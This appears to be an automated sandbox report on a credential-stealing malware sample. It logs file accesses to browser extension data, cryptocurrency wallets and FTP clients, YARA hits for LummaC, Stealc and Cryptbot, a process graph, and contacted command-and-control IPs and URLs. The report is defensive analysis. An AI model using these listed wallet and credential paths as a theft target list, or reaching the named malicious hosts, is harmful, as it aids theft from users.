Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\ZTGJILHXQB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\ZTGJILHXQB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Yara detected Credential Stealer
Source: Yara match File source: 00000016.00000003.2817573119.0000000000552000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2748385585.000000000054D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2681910564.0000000000548000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2779060726.000000000054A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2688478544.0000000000548000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2716869243.000000000054C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2747176932.0000000000549000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2717394280.0000000000548000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2752550662.000000000054D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2716099922.000000000054A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2778454117.0000000000546000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2751030367.000000000054D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2683265747.000000000054B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2754496805.000000000054D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2719643130.0000000000548000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d015c0e328.exe PID: 7632, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: d015c0e328.exe PID: 5236, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: d015c0e328.exe PID: 4428, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 36321ea525.exe PID: 7296, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: d015c0e328.exe PID: 7632, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: d015c0e328.exe PID: 5236, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: d015c0e328.exe PID: 4428, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000008.00000003.2491430724.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2537402557.000000000138E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2696170160.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2795135342.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2788626873.0000000000831000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2532205314.0000000000831000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 9b8665be8a.exe PID: 7888, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561549 Sample: file.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 86 youtube.com 2->86 88 youtube-ui.l.google.com 2->88 90 36 other IPs or domains 2->90 120 Suricata IDS alerts for network traffic 2->120 122 Found malware configuration 2->122 124 Antivirus detection for dropped file 2->124 126 16 other signatures 2->126 9 skotes.exe 4 29 2->9         started        14 file.exe 5 2->14         started        16 d015c0e328.exe 2->16         started        18 6 other processes 2->18 signatures3 process4 dnsIp5 108 185.215.113.43, 49742, 49754, 49772 WHOLESALECONNECTIONSNL Portugal 9->108 110 185.215.113.16, 49755, 49779, 49800 WHOLESALECONNECTIONSNL Portugal 9->110 112 2 other IPs or domains 9->112 74 C:\Users\user\AppData\...\da69a13142.exe, PE32 9->74 dropped 76 C:\Users\user\AppData\...\36321ea525.exe, PE32 9->76 dropped 78 C:\Users\user\AppData\...\9b8665be8a.exe, PE32 9->78 dropped 84 5 other malicious files 9->84 dropped 154 Creates multiple autostart registry keys 9->154 156 Hides threads from debuggers 9->156 158 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->158 20 d015c0e328.exe 12 9->20         started        24 da69a13142.exe 9->24         started        26 9b8665be8a.exe 13 9->26         started        28 36321ea525.exe 9->28         started        80 C:\Users\user\AppData\Local\...\skotes.exe, PE32 14->80 dropped 82 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 14->82 dropped 160 Detected unpacking (changes PE section rights) 14->160 162 Tries to evade debugger and weak emulator (self modifying code) 14->162 164 Tries to detect virtualization through RDTSC time measurements 14->164 30 skotes.exe 14->30         started        166 Query firmware table information (likely to detect VMs) 16->166 168 Found many strings related to Crypto-Wallets (likely being stolen) 16->168 170 Tries to harvest and steal ftp login credentials 16->170 172 Tries to harvest and steal browser information (history, passwords, etc) 16->172 36 2 other processes 16->36 174 Excessive usage of taskkill to terminate processes 18->174 176 Tries to steal Crypto Currency Wallets 18->176 178 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->178 32 firefox.exe 18->32         started        34 taskkill.exe 18->34         started        38 11 other processes 18->38 file6 signatures7 process8 dnsIp9 92 property-imper.sbs 172.67.162.84, 443, 49771, 49778 CLOUDFLARENETUS United States 20->92 128 Antivirus detection for dropped file 20->128 130 Multi AV Scanner detection for dropped file 20->130 132 Detected unpacking (changes PE section rights) 20->132 146 3 other signatures 20->146 40 chrome.exe 20->40         started        43 chrome.exe 20->43         started        134 Machine Learning detection for dropped file 24->134 136 Modifies windows update settings 24->136 138 Disables Windows Defender Tamper protection 24->138 148 2 other signatures 24->148 94 185.215.113.206, 49793, 80 WHOLESALECONNECTIONSNL Portugal 26->94 140 Tries to detect sandboxes and other dynamic analysis tools (window names) 26->140 150 2 other signatures 26->150 142 Binary is likely a compiled AutoIt script file 28->142 144 Excessive usage of taskkill to terminate processes 28->144 45 taskkill.exe 28->45         started        47 taskkill.exe 28->47         started        51 4 other processes 28->51 152 2 other signatures 30->152 96 youtube.com 142.250.181.78 GOOGLEUS United States 32->96 98 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 32->98 100 5 other IPs or domains 32->100 53 2 other processes 32->53 49 conhost.exe 34->49         started        55 2 other processes 36->55 57 11 other processes 38->57 signatures10 process11 dnsIp12 102 192.168.2.4, 443, 49672, 49723 unknown unknown 40->102 104 192.168.2.13 unknown unknown 40->104 106 2 other IPs or domains 40->106 59 chrome.exe 40->59         started        62 chrome.exe 43->62         started        64 conhost.exe 45->64         started        66 conhost.exe 47->66         started        68 conhost.exe 51->68         started        70 conhost.exe 51->70         started        72 conhost.exe 51->72         started        process13 dnsIp14 114 s-part-0035.t-0009.t-msedge.net 13.107.246.63, 443, 49736, 49737 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 59->114 116 www.google.com 142.250.181.100 GOOGLEUS United States 59->116 118 4 other IPs or domains 59->118
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
13.107.246.63
 s-part-0035.t-0009.t-msedge.net United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
142.250.181.100
 www.google.com United States
15169 GOOGLEUS false
172.67.162.84
 property-imper.sbs United States
13335 CLOUDFLARENETUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
142.250.181.78
 youtube.com United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false

Private

IP
192.168.2.4
192.168.2.13
192.168.2.14
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
home.fvtekk5pn.top 34.116.198.130 true
services.addons.mozilla.org 151.101.65.91 true
s-part-0035.t-0009.t-msedge.net 13.107.246.63 true
contile.services.mozilla.com 34.117.188.166 true
fvtekk5pn.top 34.116.198.130 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
ipv4only.arpa 192.0.0.170 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
push.services.mozilla.com 34.107.243.93 true
www.google.com 142.250.181.100 true
normandy-cdn.services.mozilla.com 35.201.103.21 true
star-mini.c10r.facebook.com 157.240.196.35 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
twitter.com 104.244.42.1 true
property-imper.sbs 172.67.162.84 true
dyna.wikimedia.org 185.15.58.224 true
prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 true
youtube.com 142.250.181.78 true
youtube-ui.l.google.com 172.217.19.238 true
reddit.map.fastly.net 151.101.1.140 true
telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 true
js.monitor.azure.com unknown unknown
www.reddit.com unknown unknown
spocs.getpocket.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
support.mozilla.org unknown unknown
firefox.settings.services.mozilla.com unknown unknown
www.youtube.com unknown unknown
www.facebook.com unknown unknown
detectportal.firefox.com unknown unknown
normandy.cdn.mozilla.net unknown unknown
shavar.services.mozilla.com unknown unknown
www.wikipedia.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ false
    		high
    https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js false
      		high
      http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347 false
        		high
        https://property-imper.sbs/api false
          		high